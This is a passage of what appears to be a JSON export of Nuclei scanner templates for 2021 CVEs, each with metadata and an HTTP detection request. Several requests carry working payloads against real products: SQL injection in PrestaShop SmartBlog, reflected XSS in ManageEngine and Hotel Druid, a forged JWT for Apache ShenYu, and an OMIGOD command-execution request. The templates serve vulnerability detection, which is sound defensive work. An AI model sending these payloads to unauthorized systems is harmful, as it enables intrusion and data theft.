cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: qsan\n product: xn8024r_firmware\n tags: cve,cve2021,xss,qsan,storage\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/http_header.php\"\n\n headers:\n X-Trigger-XSS: \"\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(header), 'x-xss-protection')\"\n\n - type: word\n part: body\n words:\n - '\"HTTP_X_TRIGGER_XSS\":\"\"'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n# digest: 4a0a00473045022100f0eea65e7c17996e2113f9111c801fb16d0ac3d4acfb10eb860c142f5752e07c022072e9f6a7073167683e9506fd7a430aaa503a26d38e0cd53ea6ebee8661e2ced6:922c64590222798bb761d5b6d8e72950", "hash": "c452eada5b355a0fa38120547ee0e1e1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308388" }, "name": "CVE-2021-37304.yaml", "content": "id: CVE-2021-37304\n\ninfo:\n name: Jeecg Boot <= 2.4.5 - Information Disclosure\n author: ritikchaddha\n severity: high\n description: |\n An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the application.\n remediation: |\n Upgrade Jeecg Boot to a version higher than 2.4.5 to mitigate the vulnerability.\n reference:\n - https://github.com/jeecgboot/jeecg-boot/issues/2793\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37304\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37304\n cwe-id: CWE-732\n epss-score: 0.00703\n epss-percentile: 0.79899\n cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jeecg\n product: jeecg\n shodan-query: title:\"Jeecg-Boot\"\n fofa-query: title=\"JeecgBoot 企业级低代码平台\"\n tags: cve2021,cve,jeecg,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jeecg-boot/actuator/httptrace/\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"traces\":['\n - '\"headers\"'\n - '\"request\":{'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022079aca011c64f9f42174da4c2ac2e79327a3b7f9cb9ec87b19a1d1622f87e55f9022100c5af542979ec21dec828b8bd3914169cb6e954bef293666dacc6840bc35c6993:922c64590222798bb761d5b6d8e72950", "hash": "243f9e5f80a83322652d6956087cad0b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308389" }, "name": "CVE-2021-37305.yaml", "content": "id: CVE-2021-37305\n\ninfo:\n name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure\n author: ritikchaddha\n severity: high\n description: |\n Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.\n reference:\n - https://github.com/jeecgboot/jeecg-boot/issues/2794\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37305\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37305\n cwe-id: CWE-732\n epss-score: 0.00416\n epss-percentile: 0.73616\n cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: jeecg\n product: jeecg\n shodan-query: title:\"Jeecg-Boot\"\n fofa-query: title=\"JeecgBoot 企业级低代码平台\"\n tags: cve2021,cve,jeecg,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'username\":\"admin'\n - 'success\":true'\n - 'result\":{'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204a660859c711b126edb6415cc095e15cfdcb553cef27e02ccc482c2310f22fa5022044fb232b8a52e45910c5e030ec95e0488cdef0e8ee9ad6fa6245217f4879d18b:922c64590222798bb761d5b6d8e72950", "hash": "0467e81c7cf3458386591852a87b6f93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838a" }, "name": "CVE-2021-37416.yaml", "content": "id: CVE-2021-37416\n\ninfo:\n name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416\n - https://blog.stmcyber.com/vulns/cve-2021-37416/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37416\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37416\n cwe-id: CWE-79\n epss-score: 0.00118\n epss-percentile: 0.44933\n cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_adselfservice_plus\n shodan-query: http.title:\"ManageEngine\"\n tags: cve2021,cve,zoho,xss,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \">\"\n - \"adsf/js/\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022044a740d43743d6c86fa99d1d71e6331299ee72fdbcb93c5f5229ef1619021774022038b22cd63d9a3535d35f2588fddc0cfbfa48e7507fadda3beef37fbc2d36a204:922c64590222798bb761d5b6d8e72950", "hash": "55284988b5e9bd4e330f0fbec56db3e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838b" }, "name": "CVE-2021-37538.yaml", "content": "id: CVE-2021-37538\n\ninfo:\n name: PrestaShop SmartBlog <4.0.6 - SQL Injection\n author: whoever\n severity: critical\n description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.\n impact: |\n An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities.\n remediation: |\n Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.\n reference:\n - https://blog.sorcery.ie/posts/smartblog_sqli/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37538\n - https://classydevs.com/free-modules/smartblog/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-37538\n cwe-id: CWE-89\n epss-score: 0.02819\n epss-percentile: 0.90434\n cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:*\n metadata:\n max-request: 1\n vendor: smartdatasoft\n product: smartblog\n framework: prestashop\n tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c5fe25896e49ddfe996db7508cf00534\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022011cbd06cd63cb7a0c676dba12bbe41936a17f1692c6e859d452ad633dc77e77c0221009527cd2a263c8792320276643854160869ac14841d75ba7676bf0a8d3340c0b2:922c64590222798bb761d5b6d8e72950", "hash": "1a68ae11bef51188c9d536c59c8b7466", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838c" }, "name": "CVE-2021-37573.yaml", "content": "id: CVE-2021-37573\n\ninfo:\n name: Tiny Java Web Server - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Aug/13\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37573\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt\n - http://seclists.org/fulldisclosure/2021/Aug/13\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37573\n cwe-id: CWE-79\n epss-score: 0.00303\n epss-percentile: 0.69043\n cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiny_java_web_server_project\n product: tiny_java_web_server\n tags: cve2021,cve,xss,tjws,java,seclists,tiny_java_web_server_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    404 test not found

    \"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 404\n# digest: 4b0a00483046022100860677e3cb649f8221c48f8da8c476eaff6ae5218cc6f264058729a4175edb3d022100cde954092485d59c153fd0f1cbf309acc275463b5deb833deb6be569958419ad:922c64590222798bb761d5b6d8e72950", "hash": "30c4ea9913fec20f95c9572f76cf91ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838d" }, "name": "CVE-2021-37580.yaml", "content": "id: CVE-2021-37580\n\ninfo:\n name: Apache ShenYu Admin JWT - Authentication Bypass\n author: pdteam\n severity: critical\n description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system.\n remediation: |\n Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37580\n - https://github.com/fengwenhua/CVE-2021-37580\n - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb\n - http://www.openwall.com/lists/oss-security/2021/11/16/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-37580\n cwe-id: CWE-287\n epss-score: 0.91956\n epss-percentile: 0.9872\n cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: shenyu\n tags: cve2021,cve,apache,jwt,shenyu\n\nhttp:\n - raw:\n - |\n GET /dashboardUser HTTP/1.1\n Host: {{Hostname}}\n X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'query success'\n - '\"userName\":\"admin\"'\n - '\"code\":200'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008dc817a42d582540241a41c989a303ff874434de3f13d3696356f016dbbf7d26022078549e217e3ab9625e7da831d7b6b2071ed2f72bbeb8bc3adfa87b37e2c507e9:922c64590222798bb761d5b6d8e72950", "hash": "a97c18a1d0bb34a2aa4bafa71103ce92", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838e" }, "name": "CVE-2021-37589.yaml", "content": "id: CVE-2021-37589\n\ninfo:\n name: Virtua Software Cobranca <12R - Blind SQL Injection\n author: princechaddha\n severity: high\n description: |\n Virtua Cobranca before 12R allows blind SQL injection on the login page.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.\n reference:\n - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589\n - https://www.virtuasoftware.com.br/\n - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37589\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-37589\n cwe-id: CWE-89\n epss-score: 0.00661\n epss-percentile: 0.77395\n cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: virtuasoftware\n product: cobranca\n shodan-query: http.favicon.hash:876876147\n tags: cve,cve2021,virtua,sqli,virtuasoftware\n\nhttp:\n - raw:\n - |\n POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n - |\n POST /controller/login.php?acao=autenticar HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n idusuario='&idsenha=test&tipousr=Usuario\n - |\n POST /controller/login.php?acao=autenticar HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n X-Requested-With: XMLHttpRequest\n\n idusuario=''&idsenha=a&tipousr=Usuario\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_3, \"Os parametros não estão informados corretamente\")'\n - 'contains(body_3, \"O CNPJ dos parametro não está informado corretamente\")'\n condition: or\n\n - type: dsl\n dsl:\n - \"status_code_2 == 500 && status_code_3 == 200\"\n# digest: 4a0a00473045022100bd23716f1545a3d6b6f9928e16ff24594ad46444ca7f5d2b0ff5781948e287ef0220786b038ec0a0a3a94e2643bab4e9fb9f4be5dfaf7002efdc42df3856ca18feeb:922c64590222798bb761d5b6d8e72950", "hash": "3f62b9a71214f7a61f135b80417219b5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30838f" }, "name": "CVE-2021-37704.yaml", "content": "id: CVE-2021-37704\n\ninfo:\n name: phpfastcache - phpinfo Resource Exposure\n author: whoever\n severity: medium\n description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.\n impact: |\n An attacker can gain access to sensitive information, such as server configuration details, PHP version, and installed extensions.\n remediation: |\n Remove or restrict access to the phpinfo.php file in the phpfastcache library.\n reference:\n - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704\n - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc\n - https://packagist.org/packages/phpfastcache/phpfastcache\n - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807\n - https://github.com/PHPSocialNetwork/phpfastcache/commit/41a77d0d8f126dbd6fbedcd9e6a82e86cdaafa51\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-37704\n cwe-id: CWE-668,CWE-200\n epss-score: 0.00547\n epss-percentile: 0.76969\n cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: phpfastcache\n product: phpfastcache\n tags: cve2021,cve,exposure,phpfastcache,phpinfo,phpsocialnetwork\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php\"\n - \"{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '>PHP Version <\\/td>([0-9.]+)'\n part: body\n# digest: 4a0a00473045022100ef2253e929975a34d563cf49ee7d028f01b7b8ca671e9e6062d5b2e76c1b96ce0220201a5a0ee0a5890537e41ca1f1c7aad20a621a30e07153368fec670ab9cf4355:922c64590222798bb761d5b6d8e72950", "hash": "1756d3fec2799941e075eeb8b7f8737e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308390" }, "name": "CVE-2021-37833.yaml", "content": "id: CVE-2021-37833\n\ninfo:\n name: Hotel Druid 3.0.2 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/dievus/CVE-2021-37833\n - https://www.hoteldruid.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37833\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37833\n cwe-id: CWE-79\n epss-score: 0.0019\n epss-percentile: 0.55493\n cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: digitaldruid\n product: hoteldruid\n tags: cve2021,cve,hoteldruid,xss,digitaldruid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1'\n - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1'\n - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1'\n - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022049e77e74d7aa840c78bbc69fb100df9024897e4f9f0d9da80142b94f41067170022023e19aae9ff59fbcc630d762ee87f2ad1060e790de1227e9d1ea3819ee33d6d5:922c64590222798bb761d5b6d8e72950", "hash": "f83a7c4dbdef16c3172965d261683cd3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308391" }, "name": "CVE-2021-38314.yaml", "content": "id: CVE-2021-38314\n\ninfo:\n name: WordPress Redux Framework <=4.2.11 - Information Disclosure\n author: meme-lord\n severity: medium\n description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update WordPress Redux Framework to version 4.2.12 or later.\n reference:\n - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/\n - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c\n - https://blog.sorcery.ie/posts/redux_wordpress/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38314\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-38314\n cwe-id: CWE-916,CWE-200\n epss-score: 0.00153\n epss-percentile: 0.51586\n cpe: cpe:2.3:a:redux:gutenberg_template_library_\\&_redux_framework:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: redux\n product: gutenberg_template_library_\\&_redux_framework\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,redux\n\nhttp:\n - raw:\n - |\n GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"len(body)<50\"\n\n - type: regex\n name: meme\n part: body\n regex:\n - '[a-f0-9]{32}'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - '[a-f0-9]{32}'\n part: body\n# digest: 4a0a004730450221009c6646056c014dae8d1474e33793e69608ec63375825749a5e8a0272759ede27022074b0a45798025f41c94b87acd1281a1359b3b367b40cbb0dc29e5b447b387ccf:922c64590222798bb761d5b6d8e72950", "hash": "6d18e3e904062ca427f72c037b448a33", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308392" }, "name": "CVE-2021-38540.yaml", "content": "id: CVE-2021-38540\n\ninfo:\n name: Apache Airflow - Unauthenticated Variable Import\n author: pdteam\n severity: critical\n description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.\n impact: |\n An attacker can exploit this vulnerability to import malicious variables, potentially gaining unauthorized access to sensitive data.\n remediation: Upgrade to Apache Airflow 2.1.3 or higher.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38540\n - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E\n - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E\n - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2%40%3Cannounce.apache.org%3E\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-38540\n cwe-id: CWE-306,CWE-269\n epss-score: 0.01445\n epss-percentile: 0.8529\n cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apache\n product: airflow\n shodan-query: title:\"Sign In - Airflow\"\n tags: cve2021,cve,apache,airflow,rce,intrusive\n\nhttp:\n - raw:\n - |\n GET /login/ HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n - |\n POST /variable/varimport HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\n Referer: {{RootURL}}/admin/variable/\n\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7\n Content-Disposition: form-data; name=\"csrf_token\"\n\n {{csrf}}\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\n Content-Type: application/json\n\n {\n \"type\": \"{{randstr}}\"\n }\n\n ------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"Sign In\")\n - status_code_2 == 302\n - contains(header_2, \"session=.\")\n condition: and\n\n - type: word\n words:\n - 'You should be redirected automatically to target URL: '\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - type=\"hidden\" value=\"(.*?)\">\n internal: true\n# digest: 4a0a0047304502203de2b7d77a5529f357bcb560788f606818ec0078bd7dcc73e59424f576c7942b022100a391c11b19858fea9384a4e52929faca2c4b92472a5ce98f7ec6c5c8394c238a:922c64590222798bb761d5b6d8e72950", "hash": "c8bf18a3c938fb9a09af173729cfdaf2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308393" }, "name": "CVE-2021-38647.yaml", "content": "id: CVE-2021-38647\n\ninfo:\n name: Microsoft Open Management Infrastructure - Remote Code Execution\n author: daffainfo,xstp\n severity: critical\n description: Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with SYSTEM privileges.\n remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.\n reference:\n - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647\n - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647\n - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/\n - https://github.com/microsoft/omi\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-38647\n cwe-id: CWE-287\n epss-score: 0.97408\n epss-percentile: 0.99918\n cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: azure_automation_state_configuration\n tags: cve2021,cve,rce,omi,microsoft,kev\n\nhttp:\n - raw:\n - |\n POST /wsman HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/soap+xml;charset=UTF-8\n\n \n \n HTTP://{{Hostname}}/wsman/\n http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\n \n http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\n \n http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\n 102400\n uuid:00B60932-CC01-0005-0000-000000010000\n PT1M30S\n \n \n \n \n root/scx\n \n \n \n \n aWQ=\n \n 0\n true\n \n \n \n\n matchers:\n - type: word\n words:\n - ''\n - 'uid=0(root) gid=0(root) groups=0'\n condition: and\n# digest: 4a0a0047304502206af18db77891961bb08ab842031ca9857e34aeb1ecac121d6e3a2658d0def036022100f3712fcda08491956c1e412cd46636040d1853b3d659d0f1ac3dc1319f8a3456:922c64590222798bb761d5b6d8e72950", "hash": "398fb15a2cc3f3cba548a70a8149cde9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308394" }, "name": "CVE-2021-38702.yaml", "content": "id: CVE-2021-38702\n\ninfo:\n name: Cyberoam NetGenie Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, 